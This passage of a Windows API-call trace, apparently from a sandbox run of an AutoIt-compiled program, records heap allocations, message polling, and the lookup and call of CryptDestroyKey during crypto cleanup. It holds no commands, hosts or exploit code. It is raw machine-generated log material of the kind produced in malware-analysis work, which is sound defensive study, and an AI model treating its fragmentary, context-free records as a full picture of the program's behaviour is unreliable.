(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0187.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0187.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0187.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0187.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0187.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0187.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0187.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0187.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0187.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0187.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0187.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0187.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0187.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0187.983] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0187.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0187.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e98 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0187.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0187.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0187.983] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0187.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0187.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0187.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0187.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0187.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0187.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0187.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0187.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0187.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0187.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0187.984] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0187.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0187.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0187.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0187.984] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0187.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0187.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0187.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0187.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0187.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0187.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0187.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0187.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0187.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0187.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0187.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0187.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0187.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0187.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0187.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0187.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0187.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0187.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0187.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0187.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0187.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0187.985] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0187.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0187.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0187.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0187.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0187.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0187.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0187.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0187.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0187.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0187.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0187.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0187.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0187.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0187.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0187.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0187.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0187.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0187.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0187.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0187.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50710, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0187.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0187.986] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0187.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0187.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0187.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0187.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0187.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0187.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0187.987] CryptDestroyKey (hKey=0xa87390) returned 1 [0187.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0187.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0187.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0187.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0187.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0187.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0187.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0187.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0187.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0187.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0187.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0187.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0187.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0187.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0187.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0187.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0187.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0187.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0187.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0187.988] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0187.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0187.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0187.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0187.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0187.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0187.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0187.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0187.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0187.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0187.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0187.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0187.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0187.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0187.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0187.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0187.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0187.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0187.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.989] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0187.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0187.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0187.989] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0187.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0187.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0187.989] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0187.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0187.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0187.989] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0187.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0187.990] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0187.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0187.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0187.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0187.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0187.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0187.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0187.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0187.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0187.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0187.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0187.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0187.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0187.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0187.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0187.991] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0187.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0187.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0187.991] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0187.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0187.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0187.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0187.991] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0187.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0187.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0187.991] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0187.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0187.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0187.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0187.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0187.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0187.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0187.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0187.992] RtlAllocateHeap (HeapHandle=0x970000, 